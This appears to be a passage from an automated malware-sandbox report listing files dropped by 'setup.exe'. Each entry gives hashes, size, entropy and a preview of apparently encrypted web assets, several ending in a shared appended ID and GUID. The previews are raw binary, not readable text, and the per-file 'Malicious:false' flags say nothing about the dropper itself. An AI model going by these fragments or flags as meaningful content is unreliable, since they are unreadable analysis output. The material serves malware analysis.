              SHA1:F963A0F4951A7DEEB3EE0D090E2E288FA7ABE1F5
              SHA-256:B5669EA0F9597A3BA5B44718EE93AA9510A5083F31B0FD08DFEB2941C265658E
              SHA-512:C47B6D6A5169431C2B0B635E5CAA289CB9528E5BE988D191E40C816D73886179947B893FD6953666FE965F7208611A734EDB2108E8F677CED8830D04F92993B2
              Malicious:false
              Preview:/*! F.h.Do...!.0.....q9[.:T.....A...="-+`2C.^t[....Q.i....+....u&8d......k..R..0. ?....+.R.............1.N...y4.6F..h...@.....I...@.U.>.D.g.......%AU=#&..*Cz*t.....d.I..?]d......;....=..+}...C|[."w.?.I...b*...MI.sgoH..o..........gT..$..]E'v....#..I..-......Cjli.z...n.."]...W.F._.....Gc#LZ..J48.#..U%.f.....l.<.sY.z..t.'b^S..?...9.K$%..ae4..w...w{e.....+.........T....9..Du....G.N.z...D.Y.H..A[...&....@......S..]g....P.......S8.x...5...5.}.,(..,.9C...C..;._..:.2E}.......xF..N....}6....U...f..c...X..E..]...O.d....}E...=Sr.}...O.>..`fL&d.B..D[.>...h"v......4.D..ns..K.X.iS......[.&.. kB.f.41....PZ.ot..cw.E.\.......3U.wW..q.G...1...... .......{{_^.....O.E...(;.r.`(.e~.g<.Pr4.x...i.P..!Su.7Y[v.M.B.{.B.*.%...V.$*..._.r......2.+.$.P..g..Gj.5QUg.....%KK#.....'..}./....R.qtN..z...?{......'.%e"...f..[.4P...4..T..k.1..x_.wv..N..7..c....:P..#?..&F4.KmX*4..z]..Q[(mnO.i.ii.....b.....t...l.v'......PPj..d....2h.....=..5.6..U...`M.,fU....{j.V......#.r..<
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):629
              Entropy (8bit):7.62178139935842
              Encrypted:false
              SSDEEP:12:Ual07HCF4Bku19TWSHMnuZKu6OWyzV2dRdf370B9KsMR2cii9a:nlKt6SstO9Udj370BlbD
              MD5:F38A60FF959ECA26314FB941815C5864
              SHA1:B9E73F9602AB5CD066FCC06B0A4773016B8BD743
              SHA-256:23805B7F5C7DB4F45330D80B5E160BC8416100F6A614AA0BA328AFE1746F87F8
              SHA-512:9698C1FE1684D12945B0F2493EFDF14CCB54009661CE3D76C81510B6440ECA1242341B346E03AD5F1BADB450C102B41DCC4CA8F45D2C69FE461542603B5B9CC6
              Malicious:false
              Preview:/*.ob...y.....l.b.(&......U_.4....;.6yoU..r..8...(...>a....%."..*,B.....!#x.K..>z..I.Xi;..,.|....r.....VH..;.^k.1"K.S.y..#..............M...2.bX.n.'...C.?.>....\.3.~....-.].k.v.DE.oC.....eC-"D..m...k...w.+l.7...6..x.Dm...Pb..N%f..1..).]....N.6..._?..G..y...._.4..W9...F..d...../3z$....&fu...I.f.s.|.... ..a......X!....t... E...)...g.....UkB.aI@nZ".y.<$....vw.|.m5.c.. .... C]>...#.W.F..v...f.#T......\......].._.>.%.....&|X.:..e"xH.2......v/!;..!.T.."C.*mQ..H/..\.;.)c}B"b...*..6Y.x2x#p.G..de0....5.*..]....L.....].13}.....?{5]VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1375
              Entropy (8bit):7.842384785757962
              Encrypted:false
              SSDEEP:24:9g9PBfCgZRntxq7ZDwtmyt/bSO4c3FCpL8ZxI64YHlUj5FM/Ltepl8cCKq+4HjVD:u99ZRntKhmWO4c3FCpLV625FM/LtepC5
              MD5:BBF56EEDD131FD002507CB8D2B277C2D
              SHA1:6CFE866A12D2DE690D7DEB4D334821791FAF49DB
              SHA-256:66B9F9659BC1B81ADD9E5491A72DD92345E0763F92CFA687465FF2ADE357B68A
              SHA-512:02962FE80F5D001D6D1BFDB443F81B5DABA65ED4F1B3DDC13A5521703E7FCAA18A5EA4CBE1B0C7B67961433D6BFB5F72CC4D0CCD22DD1780A351A065645FB627
              Malicious:false
              Preview:(()=>...urgTl.la.y.rW.).ek_..q,#/....-.G:.}]J...8!..`.~...dl.9.{#..e.0..\=->T...X...........vS.+..qvN....]...r...rT..i.A4.&.F......G......mp.o.i7.;..2[....R. ....-O.>D......h..]1..RV)j.......GE.K]....;@.@..[.....l..._E....<.....GB.m.(.p.6O...A.&.t..~L../3.).......}G.nd..o....*.Z)\.....).kWZ]..]...3.H.-t..&}....ib.....m{...BGT.........`..a?T..]...s93l...}:OS.jAJ".....|..:.\..m.V....K.....O.'.|....q.v...M..V};..7h.%p..../=4.s..'.<q+ u..^...n."..S.sm..k.Y...9..."wl>..._.....c.5...'.x.a.[.0...A....vf. hpk..:l.AP(..'....9h......6..J.,.E..U..0"_......l.uH..M..Xe..[.....c.:.NAL..ou?..C...t#e.v.!4..d...j/>.P...R....o...^............T".,.^%...e.uO.F..b.SP...../..x.dr.85.0...-...{.A#oI /.\.t .a....2AP..5..j_`;O]..hS..d.c.0..G..h...8.T...h......._4.0.J........iX\..z..9E.l.E.MU.....l._P.Z.............X.....2g...\.+.@....$`.......@......)..5.1-..g..UK.3......Q..){nW....Xgx...U<..^2...Y.UL8.d.."...w.W.....b.L........o..E..3\y.....Gv.j..M...=...oP..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):493440
              Entropy (8bit):6.994115386902947
              Encrypted:false
              SSDEEP:12288:8qEmlaFvmTIocfh9WE1NVYFQ7Mjh5+kJSe3JZkJT3jucyEfQHe3JMqDcMrqyroUC:1vlaxos9WE1NVYFQ7Mjh5+kJSe3JZkJQ
              MD5:B32EAAF3AE3254BDB3FA38588F54DF84
              SHA1:01F274AB75B7B09BEC4A2BBD9131E5EFB4899608
              SHA-256:730E5097771CAC7BFEBEB9F06F134A0F4DF85417A94DE83C140295FD22DC12AA
              SHA-512:4304D8C76F1FEDE0F88562358B709DF2EA30C8BC6B22F1B6EC310B2818FDC36CC48CB38F1AD63B1A8A40B8BF6AE928DDCBBF54DA088918CB3C6DBA0E0B28330C
              Malicious:false
              Preview:/*! F..5e..gP... ........5.A..#...n.&N.3.!V.V...n....X?=..`wA.:C(.I.\X....[.....fV..8..5....c.O..;:....~.....0......A...B9.<.U#....5.b.....H..l......,)..)G....P..8..#...S/...1g$..g.H....z..Z.U"..x.zI[w.yv..Q.XwI..(=A.Q...._?.\..../L........i.@..............0xX...o.+....W.......B....o.<.a...FH...k.k.......?..l.{-..K.[_......:>....P_o.[M..1h.t...U.R..F........,..Pu.+.|.;./.M.o..F.$.8.he..<......W".7..ss..>..8..?eH.I.......6~o&3~A..Z.Y.iN.N-ig...JX..$W..H....Jc...L.g.\...3....^....%.......q].!..Tc.@.~.9..t).?*.\.Z..#.._..Qc.N.M....l".X.a..3Wa#....).9......+.......{..*.wB.9A.M.8..L*..E \.<.R.......=..].....R......6=...:=.S.....F?...I..c4...NV.C.dH..w.B....nN..CK...7..O.....k..a...~z..hT....Nv-....0[.<.u..mnvn_If.T....7\.im.....e..Bj$9.^.X..~..W.<..0.t..%v)W.O.5m1..Yg.......A.nf......s.V....WO..(.....t.5I&a+...............'.....%%..g...&..I....W.-..%...)..h..Nx..).{O..je*/......GyKA..dL./..9zu8u%...?^..J....]..$....U>g{|...<...mZ.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1651
              Entropy (8bit):7.878226601585053
              Encrypted:false
              SSDEEP:24:nFA72cu5t9aaCYy1mDgVXLUB/gfIYbk/dEj7qUDJYh7hBmQUtrtmIzyExWqh4gOI:FA2L9cmDmIBoTw6vFYhFUd31xH4mYzCD
              MD5:C5EBFF11420663F4E53AFA1577277D2B
              SHA1:FBE68269CB37C21BD04F2407C6031326A965EA70
              SHA-256:CD213F7176AC54AAD97095A8339727BDAAE9A06CA1765EDA053A4A82ABCB1B5F
              SHA-512:4A0271C12230E65987706F5BB588AA3F6DE4A2AFA9A824DE6943A8BAC7DEFCE80024C69964754EE14DBBF1F169D830BCC1CD9668431816A6B8134C39896BE096
              Malicious:false
              Preview:/*.ob=.T.n'.H~.i[..e.&............h.-..{...-GL...[.-G.D.].....#.!9.M.5....>..5..?...`.....u{.......H%.....7...,.6.d.@7 ....#+k.[.6.~.;.-R~(.%....4\...n5..9...._.=p&/yc]@.)R.Q./?6.R.......U....z.V.[.9..r......@.{......g...9....%.p.2.q.#...m....H8Ue1....\9f.6.G..r.X.....?..........S..<.`F...S....VL..d...4..."....).W...~<p......`[..g...)Q..../.Y..:~.1.yv...g..3.I..u`O.k^T".H...z.M..:.1.V....^...9..tK(......YSk...U..[.....M.$..U,$$M.Q..X.O.n..p.h.n...j.:/.DSZt..p!s..b.at.^~.<%.Q_c.R-xA.%..|.e..`.e8..IHM6N..M....~|...c.n...O.c...9.0h....{r.;.k<..d..n..I..[.i.@....fg.Mt..v.D.+.s...md..r..r^~Gf..p...M...a.h....ht.2.&G..t..F...BwXE.<N........5....RZ.>Y.....t>w3~.]}6\....Q..:.6..&C..b.xS..b..>fD....!..U....(E......r>...l}..H.lHG{./.s..'..*&0|.z|k=.gy... ..Z....-.9 .8.."h{........3.w..U..[}.....m...9.z..<.hx.@..]..T...q.E...Q.....q..O.l....C.\.....X>.x...Z....p..~. .I&gJP..pS..~n..j..w....V8..T..q.]...h..0.....S..6Y...FG....L.....C..F.AH......N..s.R..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):5239
              Entropy (8bit):7.958802632732375
              Encrypted:false
              SSDEEP:96:zZ8pfOkfSAtqudpDfk91aXO8kISgZpjn+126tscjZPEGLQOZLzWM9a:F8pVqJudpk1a+8+gZp+06PPEGLFWM8
              MD5:DF655B5F5E82B4ADB30E699FFEE54B52
              SHA1:C3E76B27B8A81DF7E915B187860810155250CE60
              SHA-256:E6B78D878A805556B3D924C92C339042D266E8DFCD967F01A51F0C72C50CA66A
              SHA-512:AE54EE3DA1AA89A39AE8DE453F72980776A8026F3E6F2D65AED798C47037A94B3BCBAB20791AF5FF4C0F5355FB685E0008754903FC1441FB81F5D7D0BEC44974
              Malicious:false
              Preview:<!doc,Y..J..O.Bw.{@.1......J{.....H$..W......8d.T2P'.V.4\......u..L..Z._+..:A....Q.D.t.PmG.<.....X[.....[..j".(..iGd].v...fX..Zt.C.\.H.=..ubig..2,......]B.Qn.J.C.k....R...y6.t..%MEm<..=.).w .L~....*...A}!./..F.R.ol....<.?Q.Qzvojx^.<.U.......0".@...k..9qtV.)....R.8..@.L...Q.$B..]A.<g]...._oL.x.y......ycEI...Q.;>"_.N....V...&...N..c.[.X|..E%y..^.d.......Z. .i...|u.yz.q?./A..r<>....8...6..<...ft]:._...:y...V(.....|.J...[*#..A...(...K........\...z.L.PR.....S...f.wD....xu.A...Ru3.N}./..8!Z.........f.M.-vx+W...NG.Wm....*.l../.n.^.\.].......z..,......N........!...p..YE.|...y..I..M.".7.+4.H.h.<wA...p..cU.4.p..9,..../_w)....:.KVr..EP%.}..O..N..=U.......j.2$........T..Z..]....]..~.".oo.V...xy....W.C...S.....u.C.O.9...V....mn....D.w.....h...E..B...R.*}.&...B.'...T*..j......=.. ..5...Qp.h.....G._"..:.l...WH.|..2........L...k.S..oQ..Q.........d..WzF..@...`..A.D.....v#.R+...e/..0.%._......G.!....H5.eu$?'....<... ..>.w..c.#...Z.s..d&...B.?....S..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):330024
              Entropy (8bit):7.338990312586657
              Encrypted:false
              SSDEEP:6144:Rpkuyk43nZxFl70Hgf41zyqpDdDWBQBfMrE/qWbgo9AhTZQKZBGD:Re/Zbl7IgwwqpgBQ9MrUqQ9Ktw
              MD5:F61705F2CA74EC540DB28A838A583901
              SHA1:6B2FE342E864934472BB2C796F9AFF649F4194F8
              SHA-256:608B3E6C422F7519A95EEC88FC60188BB126C648B7D3B277D1C9585150CA2B5A
              SHA-512:0190CBE65FC883AF63DFDF31A59FE02BCC18EE85A7B3ACC036F01A23C4E06638272B4FBD7ACD9A4A77965D9FB60EBE36891A87A4A10B973296FB49B68330CC47
              Malicious:false
              Preview:/*! F[..8..d........1...ao..kY. G.O...)DwB'...c..-...E6.h.....`/.i$...y1vU.9.....},..qcQw.|.[...Wj"..b..),.x.B.^...+.....a.#.`.....D'g@.!....ug...l.,.W...$!k....EuF.I....T.....'N..8C.;.C...a..".+..G...f.@......'../..L.B..kl..#.!..|D..G........~..V.Xo:...;*.....z.v.b.9J.<&b....X..-.\.rSFX>8.I.......xkS}\..xW.&..0...I.>.o...0b.@*.. ..D....r.........e...w.....HCL.4PD.w..1.k..j......-.HC.....`..a..../Gm...x\.Lm...QD....q.N}}...\.T..q.e=...:.z....3..p.I..7.p......#<...3G`.q...yj..x...scg...w.Er_.({U.=......kU...6.......V..@...G.n.....D.i. ..^&....W.^..|.{COe.........@.#~....c&'.....^o....F..f.!.6...jflx..=j...S..q%hF...-.Bn..e,Tm..`..Y..K.w.]B..;......l.+..BSb8.g.V....DP..I....Ic......d....w..GE...X!....#Tf..55eC.g...l......q^.Xf....0..e.e..Z......*t..P.=e.`b.].h.N)qU.de...C^..._...........0.j{......)..>..U..S.7J.VW.Q.....-.h1{.EF.A.....i.T...Y.R0...4.\.t..}.5.c.R.....p....T....e...,.}...T....oG..'.\.....OqB.#P.?b.".#A..Y.7...I........f.c.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):629
              Entropy (8bit):7.659977130337563
              Encrypted:false
              SSDEEP:12:UEhXnu5dfL/cJXHj7GfehdVHalwyQjsN4i2ujA3V1o48e/gsMR2cii9a:BXu5dz/QjiehvjjY1jF4dBbD
              MD5:A9FEF97007D589EBFD01046646A87BBE
              SHA1:195CF5BE7845954969C52F68008FB4656B3B77F7
              SHA-256:C9209C02A354AE12D542E795C5E79221724A4FDA973281801B14F13FA370FB6C
              SHA-512:ECF08726A446D8AD1B4515DEF8150806343CEBE07933404D684904B33EA477F72D53A72A36CE61369153AA062E0168D5EE45AB73DC731662384A109D0D806E2E
              Malicious:false
              Preview:/*.ob.t...+$.oT...}...O...r..H...FCe#a.N]0...Y3....HO.&. ...... ...,.....-{ig.6..Ui.[.c.Ge....,.G.......:..R.yY.`}....@J_.....u.].@....X.I..*1.o$....V.Y.h.O$"...........*.i....\.7.R..p...M@....D..>3.}M.(....:..d....E.3...0:..t...N.&...ke.s..\.F..`..~..;Jk...>.v.M+..m.t.....4E..r.,S.U.S%.2{..Dc+.......C^..7ZLX...}.....hA.J..]A.'. R....l...-.....;.d.....e..7...../.%.J..~\o..d...."u.a.~!.jNr..^..%a.n.0.o..G.GS...0.Ib...,.jxb.......m.!.....v..{..[..Oh+.Rd(D........u.F7C.~....rv.".-kw..4..{'?0...wU.".R.......C...^...Y>..Q1....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1890
              Entropy (8bit):7.895672618098899
              Encrypted:false
              SSDEEP:48:KKrdLluS4FcWAAumEjH49dF+A4uLNG2ciUCuLqD:DdLD7nFljYTbciUCuLi
              MD5:25604DF1003EC08155AE180297B14064
              SHA1:2F12AD151986826BE74FD52669C869ACC50D93B2
              SHA-256:13ED6C46CD7462E99F5C40943D9A3BBD331BEBB4041669219D6ABD5127303CF7
              SHA-512:EE5C778EE0F37B00789DDF37A9A1B2A4F9EDF059CCD406D1E6B016DF4D0A62406C07E06EF03764BBE1520060EC2DF3AE96D9A74C6461C1FDC321469B41235831
              Malicious:false
              Preview:<!doc...A.R...j..'.......L..Z...``..C.i.._...I...6.g&.!.eU...N.i.iT..l./<.v.-9..@.....f.,....w.....4Iot.?>r.....|,.H....3..4.. d...]t.d.xh.m<RBh;."B..y,.K..~..g.."...p..<..I.Q.c..\..._(.v...k*......?.2.DM...1V.#.. \.c.Hy...}......T......P1K.m.k..#..G>."..O`ZE"..8.WG..E...VVP..-.$q;....[.......gA.+.6Z*....K..s.F....?..V...=..8n....U....kA..........s..'S..g..K.h...S..8....".)..U0.../.......%.z.y^..wB..t\.K@bdl...).3....P......yv.T.8fp.....d..6.......y.-..fpTX........vo..]...."....v.g.u.).E>.}.T.b..g.^4.y...\...h.{.J..v.8....*+...)7.~q.n..3...$5..(..9v.....L....1.Y..X.......).....=.A\G...N..].lZ....C3.......S.3.Q.y2.n..@.z@8..X.....6.+[..l..0..afV:.M..j......<..]...Said.?.aN.(...\$.3....<^L.r.WB..%...0..C.%q..P..S.U:D..t..D..m.p.[.i=.(.Gar.&~.....n..Y.N'..^...9c..Lj....B.&V^..NH.5..`....X..:....~-.`...Bc.'H.u....;|.;..?..K."c`.D.&.0.....3&k2...s../#..-%49s....;=..iN..2..B............8._u...P.%....a..s<.....*.@....XT..VYj.,..q.....?.!.d:B.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):552583
              Entropy (8bit):6.783699466887673
              Encrypted:false
              SSDEEP:12288:soo81yiFOZl8sy7Ovx7N+skLnBYFQPMjh5OkJSe3J9OkJT+jucyBfQHe3JbwrQKV:s98wNZisySvx7N+skLnBYFQPMjh5OkJ4
              MD5:89CC9F950B526C6B5A0E771529FD385D
              SHA1:B328BF39D2AFA2D3C9426157CC182A5E9B612C78
              SHA-256:F251CF0D6EA9829DD36230FC8F81E3BA66368D9E006DE7D9628E0205FD1D7CE6
              SHA-512:3C0E696D3038DB70909A0128BC377CEE93FC34ED4D39023632F9C8FD2DA5EF2638FBF3858A8110F3929CCBC9B5AB93AD90E237496A49018F695312B9C8826324
              Malicious:false
              Preview:/*! F96B[""0C..(....Q..._.oT...U......g.*.?=...X$.j2...w.7..S..4.7+*.-.....=.5.l.....L.QIy..c........6.B.....K.S3...R..\o..P.~...VY?F.d.)...6'U8R../q..X..q8#.H......E..)A....i...~.O..x...OjR....q .5.W0q.....Q....p..0t..........z..T.&s..5.S.<.....e...!.....2/.....7.,.E +s._.t./.B............6.t..uw.4............K.....z.~....^-*v&......0.wB.q.[...2..c./..z.u.t..A.d>.b.O........X.....$..E1.=...<..SGP.5.N..D...l...* ...X..NA+..J...............R..Xo8...]..u.)....X.^..*.G...n.....f._T.....oM..4.#D.(,C.i..:..?...4..t..z)K..P...[....$...=.-......."...oR.._........'...P..8a.}>...~%Wl..8.9_&m.8.........i..aQN.....d....E..*...8.`X>,...0...tT.]...xH2....@.H.&w...l_.;...x.6E..YW_.M&.R^.'.,5r.......lb......)B....m..<.`"L)..R_.D.l.'..i....tk.[+G].0..pAz.0...H..d....V.!.~..\....[o....z.Zp......s..\..$4.8.....}#2..."....&..m..e3h..../..........q\5/1.W..sq.I.7~.ZJ...........m.B.(X..m.BS.r..].r..{.H(.[. "8./......K.l. ...dBA$4.v..?...p.H....l8...T.r...>....4.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1651
              Entropy (8bit):7.896286246605817
              Encrypted:false
              SSDEEP:48:Hrs9svpv5pXmDOH2RxhR/b0MEQ5bDhPl9SD:LiWCDOWRxTDfh6
              MD5:4536F8FF67121E2FC1B52B6CEBF9982A
              SHA1:F43DE3FD108E95F6966EF452844F5CB99189E490
              SHA-256:9B70C372788402A760A24B8FE60B77CD8A6ADF70FE479FEBC293247028B7DBBD
              SHA-512:EBD62A3B54A0302445193239F2630F5AA09E47A34AD1184E754CE44E86FAF7644030D0E54A8B3513A6FD6D46ACE63D509DA407080E7621448D73551FE1D0A370
              Malicious:false
              Preview:/*.obZ:....x.M.#..M.....<.+.mbf.}....l....9EE.z' .W.z.+..dA|.C...QP...i&.6........).#...U9....p..=....+.n....H..5..`P;N4. ...g.tS....!urQ9.x...0.L.[..K\.l'.'{...x.f...c....0.3"....=.....mE3...C4.(.h.U.......r...>.#.Edz..Y..O!2'..Cy.^.p.M....,N?;.....5V.JM..]ei...zq(..e....?.B...=.F.......t.A=C...._.y...j.L'.......Kz..;.)L3..^Z.c..wl.C~x..J...7b.u.&$.c....lg.-?.V12.A...........g..uqM...wy.K.l..3u.u...}{..H....y`.,'.:.<..Y..!o.......}...$....@.!.N,f.0"..:IFJw._.&.x...&@6.@<.q79..B...}wE..o..7..AT.)(.Gj......N.....X3}.=.m.$R.i...}.V........w..of...%........Q....G.f.......{.bQ...7.U..x........i.W..m.....q...S&1..wB.C9....a.0..,..U.<....`.o.}# ......t..j(....4h.M/C ...Iz..<.C.M....ILa.c..e..j..........R3.. ...M...Aj...5(".D..bA.|..."o...@..fS.l/...G.!z......yA0..4.P0.D.vl....].._..q.{....W...U....z.).6._.0u1.Y[.....3.....>.a.T+...Lf.=_6.^p.n.....oOD..7.....).!...P..P..3...J..nP..t".Y`....v..!0t4...?..[....b....k;.V..z.].M`.X..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1747
              Entropy (8bit):7.881027962724503
              Encrypted:false
              SSDEEP:24:ONYpqePZaTbZhUwbQylsC8NicC+EQmKctox93PBlUXNsBjxISMbD:NqzbQwbB2C84KEdKNb5igID
              MD5:6837A3C05FA51726AA24B12E0D4D863A
              SHA1:3624922665FD873F74D8C7A97FFEA27288BF011A
              SHA-256:00CE993002CF271AC3A8FFE37FA0C54D4FA1AE754F6D878BA40ABD56EAE708BD
              SHA-512:9089BC0B284BFC56B1C356BD7ACDF54BED451985944F47CE1B2DFF71F93C3B17B80B55FB8F23FEBAFA271994C6422D355FD4BF812F1CB093FD00801815A6AEF2
              Malicious:false
              Preview:<!doc..3.....Z..&.T.....-..q.i..9...............9...cv..*N..u....._.....2..a..'......9.!.[,.@H.....Yy....YBq.Hs......9.M........G...x(.T..,...8.Fe.I.M..hC,|.g....X\_...J.......u.z.........HJrn...#.t..tV......0..P.AJ(...$;..7.i.&&M..3M.......z...U)..[].x..c).^......<..v......\..>..j:....W.}...C.fYim/>4oC..mI.'...D].".&...D.u.=.L..*.B....d0..."..).._.(.Jd..m.*f...(a8.c*..."...7...c....`.[R..H..]...Z....P.3.m..s..=..."..m.o...$[.3`..z...[...I........<.o].C....$..Zr.U..YG&......1.5...N.....}......V[.....-Z.Fe..)......m...t...m..].\..._...lU.)+...5.~g..)..GYS..|...Z...Q...R...YA...bO>.X`E....B......{..I....>.o..:.W......a...P...kG...\..,...S..I...x...U..0gzQ.f"Zmj.i..|.!;4.jE.@x..6.....fo..~C.Q.D7Xt..d.."{... .\...&'g..i.O.#..vt....q>..7..,..T....%......n...Q.{.&.......U..8S....|...#.C.D..<..........4...g..~.-h.I{...4 \)..V.1..x.......>.GHB.a....y...<`.?[ ...8...P2.v...#...6a.h......V...D...O....-.rol.Y..*<-......H....o-..dI[..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):371
              Entropy (8bit):7.341307091159222
              Encrypted:false
              SSDEEP:6:oAG2nXoEW6B29fPrd6XoXowxUuF2yD60a5v9K5VMH7dFDwWsXkNR2cii96Z:/4rfTpxf2jH1K5+bbXsMR2cii9a
              MD5:6050C13535D0B13FCE1F04A91BC09EA3
              SHA1:C269797AC6586749F75FDE17E3256B6C0D0338B7
              SHA-256:1DB31450657BB7CDD1D6D6D79429FDEB70B122D314F4FD2F2D80C4406B9EC97D
              SHA-512:3C5E6D5A6944A7F33E4793C33DA4072EED9E761928569E405BC48BB292A356ED817DE220203184D34FC97E3180CF207F5C7ABF216A5416441EAF427BEBD23650
              Malicious:false
              Preview:windo..e=S.$..2.......rU...JK1.o..h..i....R....;.....i.S.z\`]...N.]../..Z..Fr.r.U.e....*.....O.4...{.......aF...2g.~.w.|=....sy@.A.PB.?G...m...&y+..cB.ac<....U..,r4..'..?j.s.*KG.z...J.......z..!@.[.AN.&e.........*.<.0..9vO...p..V....Y.rx.9.z..^.K....6$_.N>.;.]s..j...[.k8.x.NO.A..8VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):16498
              Entropy (8bit):7.987830005604906
              Encrypted:false
              SSDEEP:384:cZ6t0d9Z0zosZCgMYpOhfKsjyOqqpYpSXbbHIhJnRW0rQdgbTHkw:69ZLYpOhTl7qW6fPb7kw
              MD5:D2764D751B0934948CE4D557EF1911C5
              SHA1:9D7CA2A48EF8AA489CD1E9CB50543ADBFE2AAB88
              SHA-256:8C0CDB2161568082A25653CC11EBCC4D9BB00A8D07376A91B8D15AF2A2CE16C4
              SHA-512:026EB886AA18DE04B4DDF3554386DBF0CFFDD906872594FECBF82148E57801FC2943268C549C4E496CA38B347B2C916F0C0B81B9DF18EDC8C2EE64A0DF364943
              Malicious:false
              Preview:(()=>.;16.N[jt....>..F.....u9..j....6..r...i.>....?.."D.z .....q.\".......i.....J}...+..a.O.......h..+..x....{.W..`.....Q.....%K......FH.....r]R.[~.u.[..u....w:....h..e.e.....U&.?.S...,[XK....e....k..M#......0B..I.....<z.63.e.....#.\..n<....]..V.....4W.'..$U..$...=..I...mr_..-..T2/.z..~..{y..g.n.~...c...'_..K...._3.Q..%M...R.&.2..I.D.).|{....z|}.. ...g.M.:....re........3*.../......U.P.....%..1.....JVY...$..?"H.q.....+h............J..1...b....go.p.7.."......c..&.p....k.p..W8_.t.^a..,.U^P{K..Sh..J3.^V..#.....=.~..*..`.....k.....^.0!b...5m.....r`c..&r....?...>...r{.3.N./.....`.Ua.72r..X.5|....h.cT...S...Gf9!6eG.].u>.. '..I..C..n.....T+..,...kmRV...t......GK.rZE.]+....v.9.=.99......0.^.b.*b..[.j).X...m.d..62....v0.f..H.1.......-...$D..].iB=4T.ga..#...;...El.{;...1......;....c-2nfP....q..Sq.._.y...b..S.v....E...Ro.H.X....0-.y.}.."./.. nU..S.<."..\~....E..8%.....z..........[.2....l>..I...!/Gm......o}...DQ...ED..............Q.W.....(.IU.)k.p...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1394997
              Entropy (8bit):6.145553175250835
              Encrypted:false
              SSDEEP:24576:zNV61E2Fx2Mr+Y2mHDvpttZwJbhTJrSK4VPYOI+AmOkmMOkxhdlrw+QsjZIQi6So:neE2Fx2MrPbDvpttZwJbhTJrSK4VPYOx
              MD5:1DC64D78F792365E7B6D16FEA3AF7208
              SHA1:36EAB71A335FC2827459D16D0602D01CEAA364FB
              SHA-256:7F13A7E2CF20521BE017ADC5346FCFC0BB022E8C5D4D90322BAE8D0AC814B4CF
              SHA-512:D2BA9DE9F95037034ECACBD1B16BC8F67C2BEBC9E944EDAC32D3D912CE082442F927AC1227D00AEE9F73613F1662C3CF102FD8092CB16C358ACE4AC2A0BBAF70
              Malicious:false
              Preview:/*! F+....Nb..q...O.S[.......9k[...MS....P:W.HR.R.d.".... @A..8...D'd,.....#..{.....7l..]..d5.U'ma.s\pu..i.....j!.Z.l...QS_...m.y.uX..s..*1....{.=;..s..f..z..y..Q".....Qi....r...1.s.]..C...n..$...[+....=.AKk-jS...7...........S;.T,c...K>,..?.e........4.4.X.}...I......Zi.W.....A..{...2N(............<..A5o..).3.?.G83..U?.(.K...mF....E..N.0..i@Zov|.....<.....W.p.K...{8..0...{.$S...^.'..+7...\.C..d ....KQ.{.......*.>.P/b......:..L..<. .[U.}._..u........C..:uR.m.|.o.....u.R........\..=...$X.G.W.sx...-.2:4..Q..&\.{.RdTw.....7.dO....p...qz[#......A1..y..<.%..E....b.Cr..~.v........@.87H!..<........p!}{..A......Vt.1....x0......s.f.Y.?=.?.W....(.84.....IcH.ro.A8.Q.Lm....x......!..a..:.Q..y.&+3.[v......s..f..qo?...E.....tx..^.....2.m.]..xa.P.I!P.....n@.d.....g(.C...$..W...G.YK2....;.o8K.VR....+..m.'.m....3d..>G...[..80.Tw.j...f.....p.-$..O.....?.1.#$.%S.....*....!OTm7.b!H3..hhc9.P.Q._.p...O.f.z.,.~.....I.K.(.4.-.).lb..*.<...,..a....&.1.s.:.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2128
              Entropy (8bit):7.90818150895945
              Encrypted:false
              SSDEEP:48:4emDCs7qAmj10CH7vc2A15LIpcb0QFZ26XGAWe1UEMaxdeyD:4H/vmWU7vi5L022oGeeEMDa
              MD5:54F7FC3E4977D5ECBDC53B19D96AAB5D
              SHA1:A27316733517B235428ADF29F720F6A827A51D79
              SHA-256:CC29A183E6CBFE8C285729A5F5876EAC83AC58EA5CB191D35330080C01253E07
              SHA-512:9461F72AE1E8741346103C0FB1AE4B6650F6EA14E529407F690BC969C5397F94B58E675669DDACA6B0919D3C994D728C0AD3DE66FFDA5E265A91DE83E33A2CD4
              Malicious:false
